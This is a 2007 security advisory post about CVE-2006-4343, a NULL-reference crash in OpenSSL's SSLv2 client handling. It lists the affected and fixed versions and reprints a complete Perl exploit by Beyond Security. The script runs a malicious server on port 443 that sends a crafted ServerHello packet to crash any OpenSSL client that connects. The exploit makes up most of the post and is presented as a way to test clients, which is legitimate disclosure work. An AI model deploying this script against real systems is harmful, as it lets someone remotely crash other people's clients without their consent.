Thursday, December 20, 2007

[EXPL] OpenSSL SSLv2 Client Crash (NULL Reference)

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OpenSSL SSLv2 Client Crash (NULL Reference)
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SUMMARY

A vulnerability in the way OpenSSL handles ServerHello packets allows
remote attackers to cause the client connecting to it to crash, the
following exploit code can be used to test your client for the
vulnerability.

DETAILS

Vulnerable Systems:
* OpenSSL version 0.9.7 before 0.9.7l
* OpenSSL version 0.9.8 before 0.9.8d

Immune Systems:
* OpenSSL version 0.9.7l
* OpenSSL version 0.9.8d

Exploit:
#!/usr/bin/perl
# Copyright(c) Beyond Security
# Written by Noam Rathaus - based on beSTORM's SSL Server module
# Exploits vulnerability CVE-2006-4343 - where the SSL client can be
crashed by special SSL serverhello response

use strict;
use IO::Socket;
my $sock = new IO::Socket::INET ( LocalPort => '443', Proto => 'tcp',
Listen => 1, Reuse => 1, );
die "Could not create socket: $!\n" unless $sock;

my $TIMEOUT = 0.5;
my $line;
my $new_sock;
srand(time());

while ( $new_sock = $sock->accept() )
{
printf ("new connection\n");
my $rin;
my $line;
my ($nfound, $timeleft) = select($rin, undef, undef, $TIMEOUT) &&
recv($new_sock, $line, 1024, undef);

my $ciphers = "";
my $ciphers_length = pack('n', length($ciphers));

my $certificate = "";
my $certificate_length = pack('n', length($certificate));

my $packet_sslv2 =
"\x04".
"\x01". # Hit (default 0x01)

"\x00". # No certificate

"\x00\x02".
$certificate_length.
$ciphers_length.
"\x00\x10".
# Certificate
$certificate.
# Done
# Ciphers
$ciphers.
# Done
"\xf5\x61\x1b\xc4\x0b\x34\x1b\x11\x3c\x52\xe9\x93\xd1\xfa\x29\xe9";

my $ssl_length = pack('n', length($packet_sslv2) + 0x8000);
$packet_sslv2 = $ssl_length . $packet_sslv2;

print $new_sock $packet_sslv2;

close($new_sock);
}


ADDITIONAL INFORMATION

The information has been provided by <mailto:noamr@beyondsecurity.com>
Noam Rathaus.
The original article can be found at:
<http://www.beyondsecurity.com/bestorm_overview.html>

http://www.beyondsecurity.com/bestorm_overview.html

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